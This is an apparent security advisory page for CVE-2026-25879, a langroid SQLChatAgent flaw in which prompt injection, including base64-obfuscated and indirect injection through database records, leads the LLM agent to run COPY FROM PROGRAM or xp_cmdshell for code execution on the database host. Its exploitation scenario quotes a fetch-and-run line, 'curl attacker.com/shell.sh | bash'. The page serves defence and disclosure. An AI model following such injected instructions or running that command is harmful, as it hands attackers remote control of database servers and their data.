CVE-2026-25879: langroid: Prompt-to-SQL injection enables RCE on DB host

GHSA-mxfr-6hcw-j9rq CRITICAL CISA: ATTEND
Published May 27, 2026
CISO Take

Langroid's SQLChatAgent passes LLM-generated SQL directly to the configured database without any validation, allowing an attacker to coerce execution of database-native OS primitives (PostgreSQL COPY FROM PROGRAM, MySQL FILE, MSSQL xp_cmdshell) through crafted prompts or poisoned data returned to the LLM. The CVSS 9.8 score reflects network-accessible exploitation requiring zero authentication or user interaction, and a public PoC demonstrating full RCE via base64-obfuscated prompt injection is already available. Any deployment where the database role holds elevated privileges — common in developer and staging environments, and in any non-minimal production PostgreSQL setup — is fully compromised once an attacker can shape agent input, including indirectly via database records. Upgrade to langroid 0.63.0 immediately; if patching is blocked, restrict the database role to SELECT-only and revoke pg_execute_server_program, FILE, or xp_cmdshell privileges from all AI agent database accounts.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

Critically high. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) with a working public PoC and no remediation complexity beyond upgrading the package. The attack surface is any internet-facing or multi-tenant application using langroid SQLChatAgent, particularly where default or developer database roles retain OS-level execution privileges. The indirect injection vector — triggering exploitation via data already in the database or documents fed to the agent — significantly expands the realistic attacker surface beyond direct-user exploitation. EPSS data is not yet available (CVE published 2026-05-27), but the combination of critical severity, public PoC, no-auth vector, and novel AI-specific attack chain warrants treating exploitation likelihood as near-certain for exposed deployments.

How does the attack unfold?

Prompt Injection
Attacker delivers base64-obfuscated malicious SQL instructions to the SQLChatAgent either directly via the chat interface or indirectly through poisoned data records returned to the LLM.
AML.T0051.000
Payload Obfuscation
The injected prompt instructs the LLM to decode the base64 payload during its reasoning phase and silently populate RunQueryTool with the decoded SQL, bypassing naive string-match defenses.
AML.T0068
Malicious Tool Invocation
The LLM generates and submits a malicious SQL query containing COPY FROM PROGRAM (PostgreSQL), LOAD DATA INFILE (MySQL), or xp_cmdshell (MSSQL) via RunQueryTool without any validation gate.
AML.T0053
Remote Code Execution
The database executes the attacker-supplied OS command with database user privileges, enabling arbitrary command execution, data exfiltration, or pivot to the broader host infrastructure.
AML.T0050

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Langroid pip < 0.63.0 0.63.0
4.1K 4 dependents Pushed 7d ago 100% patched ~14d to patch Full package profile →

Do you use Langroid? You're affected.

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
0.4%
chance of exploitation in 30 days
Higher than 33% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

6 steps
  1. Upgrade langroid to 0.63.0 immediately — this release defaults SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with dialect-aware dangerous-pattern blocking.

  2. Audit all langroid deployments for allow_dangerous_operations=True in SQLChatAgentConfig; this flag restores the vulnerable behavior and must only be set for fully isolated, trusted-internal deployments.

  3. If immediate patching is blocked: revoke pg_execute_server_program from the application database role in PostgreSQL; for MySQL revoke FILE privilege; for MSSQL disable xp_cmdshell via sp_configure.

  4. Enforce principle of least privilege for all AI agent database accounts — SELECT-only roles for read-only agents, no DDL, no COPY, no EXECUTE privileges.

  5. Add database audit logging rules to alert on COPY FROM PROGRAM, CREATE FUNCTION, LOAD DATA INFILE, or xp_cmdshell execution by AI agent service accounts.

  6. For indirect injection exposure, review all data sources fed to the agent for potential prompt injection content before ingestion.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity Article 9 - Risk Management System
ISO 42001
8.4 - AI System Security by Design
NIST AI RMF
MANAGE 2.2 - AI Risk Treatment
OWASP LLM Top 10
LLM01:2025 - Prompt Injection LLM08:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-25879?

Langroid's SQLChatAgent passes LLM-generated SQL directly to the configured database without any validation, allowing an attacker to coerce execution of database-native OS primitives (PostgreSQL COPY FROM PROGRAM, MySQL FILE, MSSQL xp_cmdshell) through crafted prompts or poisoned data returned to the LLM. The CVSS 9.8 score reflects network-accessible exploitation requiring zero authentication or user interaction, and a public PoC demonstrating full RCE via base64-obfuscated prompt injection is already available. Any deployment where the database role holds elevated privileges — common in developer and staging environments, and in any non-minimal production PostgreSQL setup — is fully compromised once an attacker can shape agent input, including indirectly via database records. Upgrade to langroid 0.63.0 immediately; if patching is blocked, restrict the database role to SELECT-only and revoke pg_execute_server_program, FILE, or xp_cmdshell privileges from all AI agent database accounts.

Is CVE-2026-25879 actively exploited?

No confirmed active exploitation of CVE-2026-25879 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-25879?

1. Upgrade langroid to 0.63.0 immediately — this release defaults SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with dialect-aware dangerous-pattern blocking. 2. Audit all langroid deployments for allow_dangerous_operations=True in SQLChatAgentConfig; this flag restores the vulnerable behavior and must only be set for fully isolated, trusted-internal deployments. 3. If immediate patching is blocked: revoke pg_execute_server_program from the application database role in PostgreSQL; for MySQL revoke FILE privilege; for MSSQL disable xp_cmdshell via sp_configure. 4. Enforce principle of least privilege for all AI agent database accounts — SELECT-only roles for read-only agents, no DDL, no COPY, no EXECUTE privileges. 5. Add database audit logging rules to alert on COPY FROM PROGRAM, CREATE FUNCTION, LOAD DATA INFILE, or xp_cmdshell execution by AI agent service accounts. 6. For indirect injection exposure, review all data sources fed to the agent for potential prompt injection content before ingestion.

What systems are affected by CVE-2026-25879?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, Text-to-SQL pipelines, Conversational database interfaces, RAG pipelines with database backends.

What is the CVSS score for CVE-2026-25879?

CVE-2026-25879 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.41%.

What is the AI security impact?

Affected AI Architectures

Agent frameworksText-to-SQL pipelinesConversational database interfacesRAG pipelines with database backends

MITRE ATLAS Techniques

AML.T0050 Command and Scripting Interpreter
AML.T0051.000 Direct
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0068 LLM Prompt Obfuscation
AML.T0102 Generate Malicious Commands

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: 8.4
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM01:2025, LLM08:2025

What are the technical details?

Original Advisory

Langroid is a framework for building large-language-model-powered applications. Prior to version 0.63.0, SQLChatAgent executes SQL produced by an LLM, which is influenceable by prompt injection. When configured with a database role that has privileges enabling code execution or filesystem access (e.g., PostgreSQL pg_execute_server_program, MySQL FILE, MSSQL xp_cmdshell), an attacker who can shape the agent's input — including indirectly via data returned to the LLM — can coerce execution of dialect-specific primitives such as `COPY ... FROM PROGRAM`, achieving RCE on the database host. Fixed in v0.63.0 by defaulting SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with a dialect-aware dangerous-pattern blocklist; allow_dangerous_operations=True restores the previous unrestricted behavior for trusted deployments.

Exploitation Scenario

An attacker submits a query to a langroid-powered text-to-SQL assistant (or embeds malicious instructions in a database record or document the agent will process). The injected prompt instructs the LLM to decode a base64-encoded SQL payload during its reasoning phase — bypassing naive prompt-injection filters — then populate the RunQueryTool action with the decoded SQL. Because SQLChatAgent passes LLM-generated queries to the database without validation, the malicious SQL executes: a temporary table is created, COPY FROM PROGRAM executes an OS command (e.g., id, curl attacker.com/shell.sh | bash), and results are returned via SELECT. The entire chain — from crafted prompt to RCE — requires no credentials beyond database user-level access to OS execution primitives, which are present in many default and development configurations.

Weaknesses (CWE)

CWE-89 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly.
  • [Architecture and Design] If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
May 27, 2026
Last Modified
June 2, 2026
First Seen
May 27, 2026

Related Vulnerabilities